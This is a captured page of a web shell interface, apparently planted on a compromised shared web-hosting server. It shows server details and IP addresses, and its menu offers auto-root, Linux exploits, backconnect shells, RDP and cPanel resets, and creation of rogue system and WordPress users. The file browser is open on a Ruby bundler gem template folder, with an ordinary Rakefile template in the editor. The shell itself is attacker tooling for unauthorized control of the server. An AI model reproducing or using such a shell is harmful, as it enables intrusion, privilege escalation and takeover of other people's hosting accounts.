Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.117.172.252
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby31 /
share /
gems /
gems /
bundler-2.3.27 /
lib /
bundler /
templates /
newgem /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
circleci
[ DIR ]
drwxr-xr-x
exe
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
github
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
sig
[ DIR ]
drwxr-xr-x
spec
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
CHANGELOG.md.tt
80
B
-rw-r--r--
CODE_OF_CONDUCT.md.tt
5.1
KB
-rw-r--r--
Gemfile.tt
527
B
-rw-r--r--
LICENSE.txt.tt
1.08
KB
-rw-r--r--
README.md.tt
2.41
KB
-rw-r--r--
Rakefile.tt
1.24
KB
-rw-r--r--
gitignore.tt
228
B
-rw-r--r--
gitlab-ci.yml.tt
182
B
-rw-r--r--
newgem.gemspec.tt
1.79
KB
-rw-r--r--
rspec.tt
53
B
-rw-r--r--
rubocop.yml.tt
299
B
-rw-r--r--
standard.yml.tt
184
B
-rw-r--r--
travis.yml.tt
126
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Rakefile.tt
# frozen_string_literal: true require "bundler/gem_tasks" <% default_task_names = [config[:test_task]].compact -%> <% case config[:test] -%> <% when "minitest" -%> require "rake/testtask" Rake::TestTask.new(:test) do |t| t.libs << "test" t.libs << "lib" t.test_files = FileList["test/**/test_*.rb"] end <% when "test-unit" -%> require "rake/testtask" Rake::TestTask.new(:test) do |t| t.libs << "test" t.libs << "lib" t.test_files = FileList["test/**/*_test.rb"] end <% when "rspec" -%> require "rspec/core/rake_task" RSpec::Core::RakeTask.new(:spec) <% end -%> <% if config[:linter] == "rubocop" -%> <% default_task_names << :rubocop -%> require "rubocop/rake_task" RuboCop::RakeTask.new <% elsif config[:linter] == "standard" -%> <% default_task_names << :standard -%> require "standard/rake" <% end -%> <% if config[:ext] -%> <% default_task_names.unshift(:clobber, :compile) -%> require "rake/extensiontask" task build: :compile Rake::ExtensionTask.new("<%= config[:underscored_name] %>") do |ext| ext.lib_dir = "lib/<%= config[:namespaced_path] %>" end <% end -%> <% if default_task_names.size == 1 -%> task default: <%= default_task_names.first.inspect %> <% else -%> task default: %i[<%= default_task_names.join(" ") %>] <% end -%>
Close